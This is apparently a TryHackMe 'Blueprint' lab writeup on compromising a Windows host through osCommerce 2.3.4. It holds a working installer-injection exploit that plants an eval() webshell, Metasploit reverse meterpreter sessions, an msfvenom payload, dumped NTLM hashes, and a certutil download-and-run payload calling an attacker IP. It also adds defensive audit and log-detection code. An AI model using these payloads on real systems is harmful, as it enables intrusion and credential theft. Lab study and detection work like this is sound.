Disclaimer
The host attacked in this article is a legally authorized lab target. The tools and methods used here are intended only for learning and exchange. Do not use the tools or attack ideas in this article for any illegal purpose. I bear no responsibility for any consequences, misuse or damage.
Service detection
┌──(root💀kali)-[~/tryhackme/Blueprint]
└─# nmap -sV -Pn 10.10.3.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 03:34 EST
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 69.23% done; ETC: 03:37 (0:00:29 remaining)
Nmap scan report for 10.10.3.110
Host is up (0.47s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql         MariaDB (unauthorized)
8080/tcp  open  http          Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
49160/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.68 seconds
Service analysis
Three HTTP services (80, 443 and 8080), one SMB file-sharing service (445) and several RPC services are open.
Opening ports 80 and 443 in a browser in turn, the home page returns an error on both.
Port 8080 serves a web app called osCommerce, version 2.3.4.
Search for known exploits for this web app with searchsploit on Kali:
┌──(root💀kali)-[~/tryhackme/Blueprint]
└─# searchsploit oscommerce 2.3.4
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities                        | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection                      | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection                   | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection                    | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting       | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload                         | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution                         | php/webapps/44374.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
It is riddled with vulnerabilities: SQL injection, file upload, remote code execution and more.
Attack
Copy the remote code execution script (php/webapps/44374.py) locally. Testing shows that PHP on the target disables the system function, but the passthru function can still be used.
Enter whoami.
It echoes: nt authority\system
Nice, the highest privileges straight away.
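The observation above (system blocked, passthru still usable, eval usable) is exactly what a disable_functions audit should catch. The following Python is an added example, not part of the writeup: it parses a php.ini disable_functions value, reports which command execution sinks remain callable, and records that eval() is a language construct that disable_functions cannot block at all. The ini samples are constructed.

```python
# Added example (not from the writeup): audit a php.ini disable_functions value.
# A list that blocks only system still leaves passthru, exec, shell_exec etc. callable,
# and eval() is a language construct, so disable_functions never affects it.
import re

# Execution primitives a web-facing PHP deployment should normally have disabled.
EXEC_FUNCTIONS = {
    "system", "passthru", "exec", "shell_exec", "proc_open", "popen",
    "pcntl_exec", "dl", "assert",
}

def parse_disable_functions(ini_text: str) -> set:
    """Return the set of function names listed in disable_functions (case-insensitive)."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()          # ';' starts a php.ini comment
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.I)
        if m:
            disabled |= {f.strip().lower() for f in m.group(1).split(",") if f.strip()}
    return disabled

def audit(ini_text: str) -> dict:
    """Report which execution sinks remain callable under this php.ini."""
    disabled = parse_disable_functions(ini_text)
    return {
        "disabled": sorted(disabled & EXEC_FUNCTIONS),
        "still_callable": sorted(EXEC_FUNCTIONS - disabled),
        # eval is not a function: listing it in disable_functions has no effect,
        # which is why a one-line eval() webshell keeps working on such a host.
        "eval_blocked_by_setting": False,
    }

# Constructed samples: one resembling the target (only system blocked), one hardened.
WEAK_INI = "disable_functions = system\n"
HARDENED_INI = "disable_functions = " + ",".join(sorted(EXEC_FUNCTIONS)) + "\n"

if __name__ == "__main__":
    print(audit(WEAK_INI))
    print(audit(HARDENED_INI))
```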
I was stuck here for a long time because I could not get a reverse shell back to my Kali directly with PowerShell.
Later I had to change my approach. Since a reverse shell would not connect, I could write a one-line webshell directly instead. Fortunately the eval function is also usable. The attack code is modified as follows:
import requests

base_url = "http://10.10.3.110:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.3.110:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# Close the quoted value the installer writes into configure.php, insert the
# one-line eval() webshell, then comment out the remainder of the line.
payload = '\');'
payload += """eval(@$_POST['cmd']);"""
payload += '/*'

data['DB_DATABASE'] = payload

r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")
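From the defender's side, the exploit above leaves a distinctive trail in the web server access log. This added Python example (not from the writeup or the exploit author) flags it over constructed Apache combined-format lines: the installer directory should not exist on a deployed shop, so any request under install/ deserves an alert, and a POST to install.php?step=4 followed by requests to install/includes/configure.php is the exploit and the resulting webshell in use.

```python
# Added example (not from the writeup): flag the osCommerce installer abuse pattern
# in an Apache combined-format access log. The sample lines are constructed.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
10.13.21.169 - - [17/Nov/2021:04:01:10 -0500] "GET /oscommerce-2.3.4/catalog/index.php HTTP/1.1" 200 5120
10.13.21.169 - - [17/Nov/2021:04:02:31 -0500] "POST /oscommerce-2.3.4/catalog/install/install.php?step=4 HTTP/1.1" 200 3377
10.13.21.169 - - [17/Nov/2021:04:02:40 -0500] "GET /oscommerce-2.3.4/catalog/install/includes/configure.php HTTP/1.1" 200 12
10.13.21.169 - - [17/Nov/2021:04:10:33 -0500] "POST /oscommerce-2.3.4/catalog/install/includes/configure.php HTTP/1.1" 200 0
10.10.3.50 - - [17/Nov/2021:04:11:02 -0500] "GET /oscommerce-2.3.4/catalog/product_info.php?products_id=1 HTTP/1.1" 200 9001
"""

def classify(method: str, path: str):
    """Map one request to an alert label, or None if it looks benign."""
    p = path.lower()
    if "/install/install.php" in p and method == "POST" and "step=4" in p:
        return "installer_step4_post"        # the step where DB_DATABASE is written to disk
    if p.split("?")[0].endswith("/install/includes/configure.php"):
        return "configure_php_access"        # the rewritten file being requested directly
    if "/install/" in p:
        return "install_dir_access"          # installer should be deleted after setup
    return None

def scan_log(text: str) -> dict:
    """Return {client_ip: [(timestamp, label, path), ...]} for flagged requests."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # skip lines that are not in combined format
        label = classify(m["method"], m["path"])
        if label:
            hits[m["ip"]].append((m["ts"], label, m["path"]))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in scan_log(SAMPLE_LOG).items():
        print(ip, *events, sep="\n  ")
```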
After running the attack script above, go to msf, find the China Chopper (caidao) module and fill in the parameters:
msf6 exploit(multi/http/caidao_php_backdoor_exec) > options

Module options (exploit/multi/http/caidao_php_backdoor_exec):

   Name       Current Setting                                           Required  Description
   ----       ---------------                                           --------  -----------
   PASSWORD   cmd                                                       yes       The password of backdoor
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.3.110                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080                                                      yes       The target port (TCP)
   SSL        false                                                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /oscommerce-2.3.4/catalog/install/includes/configure.php  yes       The path of backdoor
   VHOST                                                                no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Run it, get the initial shell and confirm it has the highest system privileges:
msf6 exploit(multi/http/caidao_php_backdoor_exec) > run

[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending exploit...
[*] Sending stage (39282 bytes) to 10.10.3.110
[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.3.110:49346) at 2021-11-17 04:10:33 -0500

meterpreter > getuid
Server username: SYSTEM (0)
The problem is that the session from the caidao module does not have the hashdump command, so we have to build another, fully featured payload:
┌──(root💀kali)-[~/tryhackme/Blueprint]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4242 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Upload it to the target and execute it:
meterpreter > upload /root/tryhackme/Blueprint/reverse.exe
[*] uploading  : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
[*] uploaded   : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
meterpreter > execute -f reverse.exe
Process 4668 created.
Catch the fully featured shell with a handler in another msf console:
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.13.21.169     yes       The listen address (an interface may be specified)
   LPORT     4242             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.21.169:4242
[*] Sending stage (175174 bytes) to 10.10.3.110
[*] Meterpreter session 1 opened (10.13.21.169:4242 -> 10.10.3.110:49350) at 2021-11-17 04:39:12 -0500

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
Take the NTLM part of the Lab user's hash above, 30e87bf999828446a1c1209ddde4c450, and crack it to the plaintext password on this website.
Get root.txt
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-04-11 18:36:47 -0400  desktop.ini
100666/rw-rw-rw-  37    fil   2019-11-27 13:15:37 -0500  root.txt.txt
Addendum
According to another expert's writeup, the payload below, used in the attack stage in place of the eval() one above, can transfer a file from the attacker machine to the target machine. Recording it here:
# Replaces the payload lines in the attack script above.
payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil.exe -urlcache -split -f http://10.8.1.72/shell.exe shell.exe & shell.exe & nslookup test 10.8.1.72 ");'
payload += 'echo $var;'
payload += '/*'
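On the host, that payload produces two things endpoint telemetry can catch: certutil.exe being used as a downloader (-urlcache -split -f with a URL) and a command interpreter spawned by the web server process, which is what a webshell looks like in a process tree. This added Python example (not from the writeup) runs both checks over constructed records shaped like Sysmon process-creation events; the image paths and the XAMPP location are assumptions.

```python
# Added example (not from the writeup): detection for certutil downloads and for
# shells spawned by the web server, over constructed Sysmon Event ID 1 style records.
import re

WEB_SERVER_IMAGES = {"httpd.exe", "php-cgi.exe", "php.exe", "w3wp.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}
# certutil with -urlcache and a remote URL on the same command line.
CERTUTIL_DL = re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*\bhttps?://", re.I)

# Constructed telemetry; field names follow Sysmon's process-create event.
EVENTS = [
    {"Image": r"C:\xampp\apache\bin\httpd.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "httpd.exe -k runservice", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "CommandLine": "cmd.exe /C certutil.exe -urlcache -split -f http://10.8.1.72/shell.exe shell.exe "
                    "& shell.exe & nslookup test 10.8.1.72", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://10.8.1.72/shell.exe shell.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -verify -urlfetch cert.cer", "User": r"BLUEPRINT\Lab"},  # benign
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(event: dict) -> list:
    """Return the rule names this event matches (empty list if none)."""
    findings = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if CERTUTIL_DL.search(event["CommandLine"]):
        findings.append("certutil_remote_download")      # LOLBin download of a payload
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        findings.append("webserver_spawned_shell")       # classic webshell process tree
    return findings

def scan(events: list) -> list:
    """(event index, rule name) pairs for every finding in the batch."""
    return [(i, f) for i, e in enumerate(events) for f in detect(e)]

if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(f"event {idx}: {rule}: {EVENTS[idx]['CommandLine']}")
```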